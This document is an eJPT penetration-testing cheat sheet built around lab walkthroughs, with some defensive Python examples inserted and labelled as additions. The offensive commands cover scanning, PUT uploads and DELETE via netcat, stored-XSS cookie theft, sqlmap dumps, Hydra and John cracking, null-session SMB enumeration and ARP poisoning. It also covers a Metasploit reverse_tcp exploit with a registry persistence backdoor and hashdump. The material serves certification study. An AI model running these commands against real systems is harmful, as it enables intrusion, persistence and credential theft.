EJPT Cheat Sheet

The document provides information on various penetration testing techniques categorized into different sections. It discusses footprinting and scanning networks using tools like ping sweeping, Nmap and fping. It also covers vulnerability scanning and operating system fingerprinting. Other sections include using Nessus for vulnerability scanning, different types of web application attacks like server fingerprinting and HTTP verbs testing. The document also summarizes techniques for directory and file enumeration, SQL injection testing, system attacks like malware, password cracking and network attacks including authentication cracking.

Uploaded by mutawa510
eJPT Cheat Sheet

FOOTPRINTING AND SCANNING

❖ Ping sweeping :
# ping 192.168.43.1
# ping website.com

❖ fping tool :
# fping -a -g 10.54.12.0/24

❖ Nmap ping scan :
# nmap -sn 192.168.43.0/24
# nmap -sn 172.16.12.*
# nmap -sn -iL hostslist.txt

❖ OS fingerprinting with nmap :
# sudo nmap -O 192.168.43.1
# nmap -Pn -O 192.168.43.1

❖ Scanning and OS fingerprinting :
1) Ping scan
# nmap -sn -n <ip address>
2) SYN scan
# sudo nmap -sS <ip address>
3) Version detection scan
# sudo nmap -sV <ip address>
4) OS fingerprinting
# sudo nmap -O <ip address>
NESSUS TOOL
❖ Find a target in the network :
# ifconfig
# nmap -sn 192.168.99.0/24

❖ Identify the target role :
# nmap -A 192.168.99.50

❖ Scan the target in Nessus :
# New Scan -> Advanced Scan

❖ Select target system :
# Policy -> New Policy -> Advanced Scan
WEB APPLICATION ATTACKS
❖ WEB SERVER FINGERPRINTING
# web server software
# version
# server operating system

❖ Fingerprinting with Netcat :
# nmap -sV website.com → port scan with service version detection

❖ Fingerprinting with OpenSSL :
# openssl s_client -connect website.com:443

❖ Fingerprinting with Httprint :
# httprint -P0 -h <ip address> -s /usr/share/httprint/signatures.txt
HTTP VERBS
❖ HTTP methods :
# GET # POST
# HEAD # PUT
# DELETE # OPTIONS

❖ Enumeration with OPTIONS :
# nc website.com 80
OPTIONS / HTTP/1.0

❖ Exploiting DELETE verb :
# nc website.com 80
DELETE /login.php HTTP/1.0

❖ Exploiting PUT verb :
# nc website.com 80
PUT /payload.php HTTP/1.0
Content-type: text/html
Content-length: 20

❖ To get the size of the file (the Content-length value, in bytes) :
# wc -c payload.php
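The OPTIONS, DELETE and PUT probes above only succeed when the server accepts those verbs from an anonymous client, so the fix sits on the server. As an added example that is not part of the original cheat sheet, the following Python module shows that control: a method allow-list enforced by a small `http.server` handler, and a helper that reads the value of an `Allow:` header (what the OPTIONS probe returns) and reports the content-modifying verbs it advertises. The allow-list and the `WRITE_METHODS` set are this example's own choices, not values from the page.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Verbs a read-only web root needs; every other verb gets 405 Method Not Allowed.
ALLOWED_METHODS = frozenset({"GET", "HEAD"})

# Verbs that let a client change server-side content. Seeing any of them in an
# OPTIONS response for a static site is a finding.
WRITE_METHODS = frozenset({"PUT", "DELETE", "PATCH", "PROPFIND", "MKCOL", "COPY", "MOVE"})


def is_allowed(method: str) -> bool:
    """True only for verbs on the allow-list (method names are case-sensitive)."""
    return method in ALLOWED_METHODS


def risky_verbs(allow_header: str) -> list[str]:
    """Parse an Allow header value such as 'GET, HEAD, PUT, DELETE' and return
    the content-modifying verbs it lists, in the order they appear."""
    verbs = [v.strip().upper() for v in allow_header.split(",") if v.strip()]
    return [v for v in verbs if v in WRITE_METHODS]


class AllowListHandler(BaseHTTPRequestHandler):
    """Serves a fixed body on GET/HEAD and refuses every other verb explicitly."""

    def _refuse(self):
        self.send_response(405)
        self.send_header("Allow", ", ".join(sorted(ALLOWED_METHODS)))
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        body = b"ok\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_OPTIONS(self):
        # Advertise only what the allow-list permits; nothing else is reachable.
        self.send_response(204)
        self.send_header("Allow", ", ".join(sorted(ALLOWED_METHODS)))
        self.send_header("Content-Length", "0")
        self.end_headers()

    # Bind the write verbs to the refusal handler so they never reach any default.
    do_PUT = do_DELETE = do_POST = do_PATCH = _refuse

    def log_message(self, format, *args):  # keep the example quiet
        pass


if __name__ == "__main__":
    # Bind to loopback only; this is a demonstration server, not a deployment.
    HTTPServer(("127.0.0.1", 8080), AllowListHandler).serve_forever()
```

Run it and send the cheat sheet's own `OPTIONS / HTTP/1.0` line through netcat to see `Allow: GET, HEAD` come back; a `PUT /payload.php` request gets a 405 before any body is read.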
DIRECTORIES AND FILES ENUMERATION
❖ DirBuster tool

❖ Find all the machines in the network :
# nmap -sn 10.104.11.0/24

❖ Identify the machine role :
# nmap -sV 10.104.11.96,198

❖ EXPLORE THE WEB APPLICATION :

❖ FIND HIDDEN FILES :

❖ Let us start DirBuster and run a scan using the directory-list-2.3-small.txt file. After a minute or two, we should start getting some interesting results.

❖ Here we can see that in the include folder there is a file named config.old. Let us inspect it and see if there is anything interesting in it.

❖ As we can see, the file contains some database credentials! If you recall, in the previous steps we had found a machine running MySQL. Let us try a DB connection to this machine with the credentials just found.

❖ Unfortunately, it seems that the credentials are not working. Let us keep investigating the files found with DirBuster. If we check the previous screenshot, we can see that there is a page named signup.php that we were not able to access from the links in the web application.

❖ TEST THE CREDENTIALS FOUND :
# mysql -u <username> -p -h 10.104.11.198

❖ RETRIEVE THE CORRECT ADMIN PASSWORD :
# show databases;
# use <database name>;
# show tables;
# select * from accounts;

❖ With the information just obtained, let us try to log into the web application.
CROSS SITE SCRIPTING
❖ Reflected XSS :
# exploited through the site's URL
http://victim.site/search.php?find=<payload>
❖ Stored XSS :
# stored in the page and exploited from within the page
# set up a server to store the cookies and inject the payload into the vulnerable page; when someone visits it, the cookies are stolen and sent to the attacker's server
❖ Find all the XSS
# Reflected XSS :
# Payload :
<script>alert('xss')</script>
# Stored XSS :
❖ STEAL THE ADMIN SESSION COOKIES

We know that the web application is vulnerable to Stored XSS. From the description of the lab we also know that the administrator usually visits the page every 3-4 minutes. With this information, we can try to exploit the stored XSS in order to steal the administrator session cookies and then authenticate ourselves with those. We need a web page that is able to retrieve and store those cookies. Instead of running one on our machine, we can use the web page hosted at the address http://192.168.99.11 (read the lab description to see how this works). Note that we have created this page for your convenience and that in a real situation you'd need to have this page on your server. So let us create our payload and see if we are able to steal some cookies. To do this we can use a payload similar to the following:

After we insert the previous payload, we just have to wait a few minutes until the admin opens the contacts page. The script will run and steal the cookies.
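The cookie theft described above needs two things to go wrong: injected markup must execute, and the script must be able to read the session cookie. As an added example that is not part of the original lab material, the following Python code shows the two server-side controls that remove those conditions: output encoding for the reflected `find` parameter of `search.php`, and a session cookie carrying HttpOnly, Secure and SameSite. A checker that reads a Set-Cookie value and lists the missing attributes is included for reviewing an application's own responses. The cookie name PHPSESSID is an assumption for this example.

```python
import html
from http.cookies import SimpleCookie

# Attributes a session cookie should carry; the checker reports any that are absent.
PROTECTIVE_ATTRS = ("HttpOnly", "Secure", "SameSite")


def render_search_result(find: str) -> str:
    """Render the search term as text, never as markup.
    html.escape(quote=True) also neutralises ' and ", so the value is safe
    both in element content and inside quoted attributes."""
    return f"<p>Results for: {html.escape(find, quote=True)}</p>"


def session_cookie_header(session_id: str) -> str:
    """Build the value of a Set-Cookie header for a hardened session cookie."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = session_id
    morsel = jar["PHPSESSID"]
    morsel["httponly"] = True      # not readable through document.cookie
    morsel["secure"] = True        # only sent over HTTPS
    morsel["samesite"] = "Strict"  # not attached to cross-site requests
    morsel["path"] = "/"
    return morsel.OutputString()


def missing_cookie_flags(set_cookie_value: str) -> list[str]:
    """Given a Set-Cookie header value, list the protective attributes it lacks.
    Attribute names are matched case-insensitively, as browsers do."""
    attrs = [part.strip() for part in set_cookie_value.split(";")[1:]]
    present = {attr.split("=", 1)[0].strip().lower() for attr in attrs}
    return [name for name in PROTECTIVE_ATTRS if name.lower() not in present]


if __name__ == "__main__":
    # Constructed inputs: the cheat sheet's test payload and a weak cookie.
    print(render_search_result("<script>alert('xss')</script>"))
    print(missing_cookie_flags("PHPSESSID=abc123; Path=/"))
    print(missing_cookie_flags(session_cookie_header("abc123")))
```

HttpOnly does not stop the injection itself; it only denies the injected script the one value this lab is after, which is why the encoding function is the primary fix and the cookie flags are defence in depth.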
SQL INJECTION
❖ EXPLORE THE WEB APPLICATION
# In order to explore the web application we just need to type the IP address in our browser.

❖ Find all the possible injection points :
# As you can see in the address bar of our browser, it seems that the application accepts a parameter (id). This is probably used to retrieve the news from a database. Let's then use this injection point for our tests!

❖ TEST AND EXPLOIT THE INJECTION POINT
# The first test we can run against the page found in the previous step is the following:
❖ We just added a single quote in the address bar, and as shown in the screenshot above, we obtained a MySQL error. It is time to get our hands dirty! Let us create a few payloads in order to test if the parameter is vulnerable to SQL injection.

# We want to test it against Boolean conditions, so let us use the following payload:

# Then let us try with the following payload (we changed the Boolean condition from 1=1 to 1=2):

❖ DUMP THE DATA
# As we can see from the previous screenshot, sqlmap identifies the parameter as vulnerable! Now we just have to get the structure of the database and dump the data. First, let us get a list of tables:
❖ Then dump all the data from the accounts table with the following command:
# sqlmap -u "http://10.124.211.96/newsdetails.php?id=1" -D awd -T accounts --dump

# As we can see, we now have a list of usernames and passwords to use in order to log into the web application! Let us try one of these:

Great, we successfully logged into the web application!
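The three probes used above (a single quote, `1=1`, `1=2`) work because the `id` parameter is concatenated into the query. As an added example that is not the lab's own code, the following Python/sqlite3 module rebuilds that lookup in two forms so the behaviour can be reproduced offline: `news_vulnerable` formats the id into the SQL string, so `1'` raises a database error and `1 OR 1=1` returns every row; `news_safe` validates the id as a bare integer and binds it as a parameter, so the same inputs are rejected or treated as data. The table and its rows are constructed sample data, and the `news` schema is an assumption.

```python
import re
import sqlite3

ID_RE = re.compile(r"^\d+$")  # the only shape an article id may take


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the lab's news database (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(1, "First post"), (2, "Second post"), (3, "Third post")],
    )
    return conn


def news_vulnerable(conn: sqlite3.Connection, id_param: str) -> list[tuple]:
    """Builds the SQL by string formatting: the user controls the WHERE clause."""
    sql = f"SELECT id, title FROM news WHERE id = {id_param}"
    return conn.execute(sql).fetchall()


def news_safe(conn: sqlite3.Connection, id_param: str) -> list[tuple]:
    """Rejects anything that is not a bare integer, then binds the value."""
    if not ID_RE.match(id_param):
        raise ValueError("id must be a positive integer")
    return conn.execute(
        "SELECT id, title FROM news WHERE id = ?", (int(id_param),)
    ).fetchall()


def probe(conn: sqlite3.Connection, lookup, id_param: str) -> tuple:
    """Run one lookup and summarise the outcome as ('rows', rows) or
    ('error', exception name), mirroring what the tester observes:
    a result page, an empty page, or a database error."""
    try:
        return ("rows", lookup(conn, id_param))
    except (sqlite3.OperationalError, ValueError) as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    db = make_db()
    for payload in ("1", "1'", "1 AND 1=1", "1 AND 1=2", "1 OR 1=1"):
        print(f"{payload!r:14} vulnerable={probe(db, news_vulnerable, payload)}"
              f"  safe={probe(db, news_safe, payload)}")
```

The difference the Boolean tests rely on (`1=1` behaves like the original page, `1=2` returns nothing) disappears entirely in the parameterised version, which is the signal a code reviewer looks for when deciding whether an endpoint needs this treatment.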


SYSTEM ATTACKS
❖ MALWARE
# any malicious software that abuses the system
• Virus • Trojan Horses • Rootkit • Bootkit
• Backdoors • Adware • Spyware • Greyware
• Dialer • Key-logger • Botnet • Ransomware
• Data-Stealing Malware • Worm

❖ Installing and blocking a malware-based backdoor :
# Installing the backdoor:
Via a CD or a download link for the file.
The file is downloaded onto the target machine.
In Task Manager an unfamiliar file (process) appears.

❖ Before installing the backdoor:
# Tools: Angry IP Scanner, PuTTY
Check the IP address and the open ports:
Tools → Preferences
Select Ports 1-1024,4400-4500

# Angry IP Scanner output:

Connect to the port with PuTTY:

# Before connecting, open a shell:

# Malware code:
❖ Blocking a backdoor :
# Go to Task Manager
# Right-click → End task
# Click Start, then type "Firewall with Advanced Security"
# Select the Inbound Rules
# Right-click → Disable Rule
# Delete the malware file
# Stopped the ncat process in the Task Manager console
# Deleted the ini.vbs file
# Closed port 4450
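The blocking steps above end with stopping the ncat process and closing port 4450, which presumes you already know which port and process are unexpected. As an added example that is not part of the cheat sheet, the following Python script does that triage from data: it parses `netstat -ano` output, keeps LISTENING sockets, and reports any port outside an expected baseline together with the owning image name as `tasklist` would report it. The netstat lines, the PID-to-name map and the port baseline are all constructed for the example.

```python
import re

# Constructed `netstat -ano` output (Windows column layout).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4450           0.0.0.0:0              LISTENING       3124
  TCP    192.168.1.5:49710      52.96.0.1:443          ESTABLISHED     2210
  TCP    [::]:135               [::]:0                 LISTENING       880
"""

# Constructed PID -> image name map, as `tasklist` would give it.
SAMPLE_PIDS = {4: "System", 880: "svchost.exe", 2210: "outlook.exe", 3124: "ncat.exe"}

# Ports this host is expected to listen on (constructed baseline).
EXPECTED_PORTS = {135, 139, 445, 3389}

LISTEN_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$"
)


def parse_listeners(netstat_text: str) -> list[tuple[int, int]]:
    """Return (port, pid) for every LISTENING line, deduplicated, in order."""
    seen: list[tuple[int, int]] = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if not m:
            continue
        # rsplit on the last colon handles both 0.0.0.0:135 and [::]:135.
        port = int(m.group("local").rsplit(":", 1)[1])
        entry = (port, int(m.group("pid")))
        if entry not in seen:
            seen.append(entry)
    return seen


def unexpected_listeners(netstat_text: str, pid_names: dict, expected_ports: set) -> list[tuple]:
    """Listeners whose port is not in the baseline, annotated with the process name."""
    return [
        (port, pid, pid_names.get(pid, "<unknown>"))
        for port, pid in parse_listeners(netstat_text)
        if port not in expected_ports
    ]


if __name__ == "__main__":
    for port, pid, name in unexpected_listeners(SAMPLE_NETSTAT, SAMPLE_PIDS, EXPECTED_PORTS):
        print(f"port {port} is listening, owned by PID {pid} ({name})")
```

On a real host, feed it the saved output of `netstat -ano` and a baseline captured while the machine was known-good; a listener such as 4450 owned by ncat.exe then surfaces before anyone has to eyeball Task Manager.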
PASSWORD ATTACKS
❖ PASSWORD CRACKING :
# Brute force attacks → try every possible password
# Dictionary attacks → feed it common words and it guesses the hash
❖ Tool:
# John the Ripper

❖ Auditing passwords with a password cracking utility :
# Decompress the wordlist so it can be edited:
# gunzip /usr/share/wordlists/rockyou.txt.gz

# vim /usr/share/wordlists/rockyou.txt
To edit the file and add to it.

# Add the passwords to the file:
Add the words gathered from the questionnaire to the file.

# Create a text file of usernames and password hashes:
Create a file containing the usernames and password hashes.
❖ Run John to crack the passwords :
# john --wordlist=/usr/share/wordlists/rockyou.txt crack-this-file

NETWORK ATTACKS
❖ AUTHENTICATION CRACKING
# hydra tool for cracking

❖ FIND ALIVE HOSTS IN THE NETWORK :
# nmap -sn 192.168.99.0/24

❖ PORT SCAN AND SERVICE DETECTION :
# nmap -sV 192.168.99.22

❖ BRUTEFORCE THE SERVICE AUTHENTICATION :
# For the telnet service, let us use the following command and see what we get:

# As we can see in the following screenshot, we are able to find some valid username/password pairs. For our testing purposes, they are enough, so we can stop the bruteforce.
# Let us confirm that at least one of these two credentials works with the following command:
Login via Telnet :

# Cracking the SSH service :

# As we can see in the results, Hydra found valid credentials for the SSH service.

# Once again let us verify that these credentials work on the remote system:
❖ DOWNLOAD AND CRACK THE LOCAL PASSWORDS OF THE SYSTEM
# In order to download these two files we can use the scp (secure copy) command as follows:

# Now that we have these files on our local machine, we can use John the Ripper and unshadow to crack the user passwords. First let us use unshadow to get the password hashes:

# Now that we have the password hashes stored in the file named to_crack, we can use John the Ripper to crack them:
WINDOWS SHARE
# sharing files between machines over the network

Default administrative shares:
d$
c$
admin$

❖ NULL SESSION ATTACKS :
# Null session attacks can be used to enumerate a lot of information. Attackers can steal information about:
• Passwords
• System users
• System groups
• Running system processes

❖ ENUMERATING WINDOWS SHARES :
# Windows tools:
- nbtstat
- NET VIEW
# nbtstat command:

Null session :
❖ Exploit null session with Windows:

❖ ENUMERATING WINDOWS SHARES :
# Linux tools:
- nmblookup
- smbclient
# nmblookup command:
nmblookup -A 10.130.40.80

❖ Exploit null session with Linux:
# smbclient command:
smbclient -L //10.130.40.80 -N
❖ Checking for null sessions with Windows :
# net use \\10.130.40.80\IPC$ "" /u:""

❖ Checking for null sessions with Linux :
# smbclient //10.130.40.80/IPC$ -N

❖ Exploiting null sessions with enum :
# enum -S 10.130.40.80 → information about the shares
# enum -U 10.130.40.80 → lists the existing users
# enum -P 10.130.40.80 → shows the password policy

❖ NULL SESSION LAB :
❖ FIND A TARGET IN THE NETWORK :
# nmap -sn 192.168.99.0/24

❖ CHECK FOR NULL SESSION :
# enum4linux -n 192.168.99.162
❖ GATHER INFORMATION WITH ENUM4LINUX :
# enum4linux -a 192.168.99.162

❖ USE SMBCLIENT TO NAVIGATE THE TARGET MACHINE :
# First let us get the list of shares using smbclient:
# smbclient -L WORKGROUP -I 192.168.99.162 -N -U ""
Let us now try to access the WorkSharing share and see what files are stored in there:
# smbclient \\\\192.168.99.162\\worksharing -N
# smb: \> ls → to list the files in the current path
# smb: \> get congratulations.txt /root/Desktop/congratulations.txt → to save the file to the desktop
# smb: \> exit → to exit the tool
# cat /root/Desktop/congratulations.txt → to read the file
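The null-session checks and the enum4linux/smbclient walk-through above are what the target's own Security log records as anonymous network logons and share connections. As an added example that is not part of the cheat sheet, the following Python code covers the defender's side of the same activity: a detector that reads flattened Security-log events and reports, per source address, anonymous network logons (event 4624 with logon type 3 and the ANONYMOUS LOGON account) and the shares they opened (event 5140), plus a check of the LSA registry values that restrict what a null session may enumerate. The event lines and the registry values are constructed samples; the "Key=Value" export shape is an assumption of this example.

```python
import re
from collections import defaultdict

# Constructed events in a "Key=Value Key=Value" export shape; values may contain spaces.
SAMPLE_EVENTS = [
    "EventID=4624 LogonType=3 TargetUserName=ANONYMOUS LOGON TargetDomainName=NT AUTHORITY IpAddress=192.168.99.100",
    "EventID=5140 SubjectUserName=ANONYMOUS LOGON ShareName=\\\\*\\IPC$ IpAddress=192.168.99.100",
    "EventID=5140 SubjectUserName=ANONYMOUS LOGON ShareName=\\\\*\\WorkSharing IpAddress=192.168.99.100",
    "EventID=4624 LogonType=3 TargetUserName=alice TargetDomainName=CORP IpAddress=192.168.99.54",
    "EventID=4624 LogonType=2 TargetUserName=bob TargetDomainName=CORP IpAddress=127.0.0.1",
]

# A value runs until the next " Key=" or the end of the line, so spaces survive.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

# Values under HKLM\SYSTEM\CurrentControlSet\Control\Lsa that limit anonymous enumeration,
# each paired with the predicate it must satisfy to count as restricted.
LSA_POLICY = {
    "RestrictAnonymous": lambda v: v is not None and v >= 1,
    "RestrictAnonymousSAM": lambda v: v == 1,
    "EveryoneIncludesAnonymous": lambda v: v == 0,
}


def parse_event(line: str) -> dict:
    """Turn one exported event line into a field dictionary."""
    return dict(FIELD_RE.findall(line))


def anonymous_activity(lines) -> dict:
    """Map source IP -> {'logons': anonymous network logons, 'shares': shares opened}."""
    report = defaultdict(lambda: {"logons": 0, "shares": set()})
    for line in lines:
        ev = parse_event(line)
        if (ev.get("EventID") == "4624" and ev.get("LogonType") == "3"
                and ev.get("TargetUserName") == "ANONYMOUS LOGON"):
            report[ev["IpAddress"]]["logons"] += 1
        elif ev.get("EventID") == "5140" and ev.get("SubjectUserName") == "ANONYMOUS LOGON":
            report[ev["IpAddress"]]["shares"].add(ev["ShareName"])
    return {ip: {"logons": r["logons"], "shares": sorted(r["shares"])} for ip, r in report.items()}


def lsa_findings(values: dict) -> list[str]:
    """Names of the LSA values whose current setting still permits anonymous enumeration.
    `values` is the dict you would build from reading the Lsa key; missing values count as unset."""
    return [name for name, ok in LSA_POLICY.items() if not ok(values.get(name))]


if __name__ == "__main__":
    print(anonymous_activity(SAMPLE_EVENTS))
    # Constructed registry readout: enumeration of shares still allowed.
    print(lsa_findings({"RestrictAnonymous": 0, "RestrictAnonymousSAM": 1, "EveryoneIncludesAnonymous": 0}))
```

A single anonymous logon followed by IPC$ and a named share from one address is exactly the footprint of the `smbclient -L ... -N` and share-browsing steps in the lab; the registry check tells you whether the host would have answered those requests in the first place.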
ARP POISONING
# the messages between devices inside the network
To enable IP forwarding:
# echo 1 > /proc/sys/net/ipv4/ip_forward
❖ arpspoof command:
# arpspoof -i TAP0 -t 192.168.4.11 -r 192.168.4.16
-i = interface
-t = target
-r = host
# target and host are the two endpoints whose traffic is being intercepted
❖ ARP POISONING LAB
# Identify the server and the client
nmap -sS -n 10.100.13.0/24

10.100.13.37 listens on port 23, so it is the server. 10.100.13.36 is the client.

❖ Intercept the traffic
# Configure your attacking machine to forward IP packets:

# Attack the victims by poisoning their ARP cache:

# Run Wireshark and display telnet traffic only:

# Perform a "Follow TCP Stream" and extract the credentials:

❖ LOGIN TO THE TELNET SERVER :
# Use them to log in to the server:
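Seen from the two victims, the arpspoof run above has a distinctive shape: the MAC address associated with 192.168.4.16 changes, and shortly afterwards one MAC is answering for both 192.168.4.11 and 192.168.4.16. As an added example that is not part of the cheat sheet, the following Python function walks a sequence of observed ARP replies and reports both signals; it accepts an optional baseline of known-good IP-to-MAC pairs, which is how a monitor would pin the gateway. The replies below are constructed and reuse the lab's addresses; the MAC values are made up.

```python
# Constructed ARP replies as (time, sender_ip, sender_mac) tuples.
SAMPLE_REPLIES = [
    ("10:00:01", "192.168.4.16", "aa:bb:cc:00:00:16"),  # host, as normally seen
    ("10:00:02", "192.168.4.11", "aa:bb:cc:00:00:11"),  # target, as normally seen
    ("10:00:05", "192.168.4.16", "de:ad:be:ef:00:99"),  # same IP, new MAC
    ("10:00:05", "192.168.4.11", "de:ad:be:ef:00:99"),  # same MAC now claims the target too
]


def detect_arp_anomalies(replies, baseline=None) -> list[tuple]:
    """Walk ARP replies in order and return findings as tuples:

    ('ip_remapped', time, ip, trusted_mac, new_mac)   an IP answered with a different MAC
    ('mac_multi_ip', time, mac, (ip, ip, ...))        one MAC claims several IPs

    `baseline` seeds trusted ip -> mac pairs (for example the gateway). Without it,
    the first reply seen for each IP is trusted, and later replies are judged
    against it rather than silently replacing it."""
    trusted = {ip: mac.lower() for ip, mac in (baseline or {}).items()}
    claimed_by = {}
    findings = []
    for when, ip, mac in replies:
        mac = mac.lower()
        known = trusted.get(ip)
        if known is None:
            trusted[ip] = mac
        elif known != mac:
            findings.append(("ip_remapped", when, ip, known, mac))
        ips = claimed_by.setdefault(mac, set())
        if ip not in ips:
            ips.add(ip)
            if len(ips) > 1:  # report each time the set of claimed IPs grows
                findings.append(("mac_multi_ip", when, mac, tuple(sorted(ips))))
    return findings


if __name__ == "__main__":
    for finding in detect_arp_anomalies(SAMPLE_REPLIES):
        print(finding)
```

In practice the replies come from a packet capture or from polling the ARP table; static ARP entries for the gateway and dynamic ARP inspection on the switch are the controls that make the `ip_remapped` case impossible rather than merely visible.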
METASPLOIT / METERPRETER
# Run Metasploit:
- msfconsole
Commands :
# show → display the available options
# search → search for a payload or an exploit
# use → use an exploit
# back → go back or cancel the selected exploit
# info → detailed information about a specific exploit
# show options → open the exploit's settings
# set → modify the settings

❖ Configuring a payload :
# meterpreter payload :

❖ Session commands :
# background → leave the session running in the background
# sessions -i 1 → resume the session
# sessions -l → list the sessions

❖ Meterpreter attack commands :
# sysinfo → information about the machine
# ifconfig → information about the machine's network interfaces
# route → information about the routing table
# getuid → the user the session is running as
# getsystem → escalate to the highest privileges

BYPASSING UAC IN METASPLOIT
# background
# search bypassing uac
# use exploit/windows/local/bypassuac
# show options
# set session 1
# exploit
# Meterpreter attack commands :
# pwd → the directory you are currently in
# cd → move between directories
# ls → display the contents of the directory
# download → download a file to your machine
# upload → upload a file to the target machine
# Running an OS shell:
# shell → opens cmd
METASPLOIT LAB
❖ Find a target in the network
# nmap -sn 192.168.99.0/24 or nmap -sS 192.168.99.0/24

❖ Identify available services on the target

❖ Find a vulnerable service in Metasploit
# search freeftp
❖ Configure the module and exploit the machine
# use exploit/windows/ftp/freeftpd_pass
# show options
# set ftpuser anonymous
# set rhosts 192.168.99.12
# set rport 21
# set payload windows/meterpreter/reverse_tcp
# set exitfunc process
# set lhost 192.168.99.100
# set lport 4444

# Now we can start the module by typing exploit:

❖ INSTALL A BACKDOOR
# By pressing Ctrl+Z inside the meterpreter prompt, we can put it into the background and work further on the backdoor:

# Type "sessions -l" inside the Metasploit prompt and keep in mind the Id value:

# Now, let's go to the persistence module, as follows. The session should be set to the same value as obtained above.

# use exploit/windows/local/persistence
# set reg_name backdoor
# set exe_name backdoor
# set startup SYSTEM
# set session 1
# set payload windows/meterpreter/reverse_tcp
# set exitfunc process
# set lhost 192.168.99.100
# set lport 5555
# As you can see, the backdoor has been successfully installed, but it was just planted on the target system in the registry's autorun area. In order to run the backdoor, we need to perform a system reboot (a user who switches his machine off and on would have caused the backdoor to run eventually). Let's go back to our meterpreter session and spawn a shell to reboot the victim system:
# sessions -i 1
# shell
# shutdown /r /f

# When in the shell, press Ctrl+Z twice to return to the main Metasploit menu. Type "jobs -l" to see if any active listeners are running:
# It seems that we are currently unable to receive any backdoor connection since there are no working listeners.
# use exploit/multi/handler
# set lhost 192.168.99.100
# set lport 5555
# set payload windows/meterpreter/reverse_tcp
# exploit -j
❖ GET THE PASSWORD HASHES AND CRACK THEM
# hashdump
# cat pwd
# john pwd
❖ LOCATE AND DOWNLOAD THE CONGRATS.TXT FILE
# search -f congrats.txt
# download 'c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt' /root/

# Now, we just need to open it:
# cat congrats.txt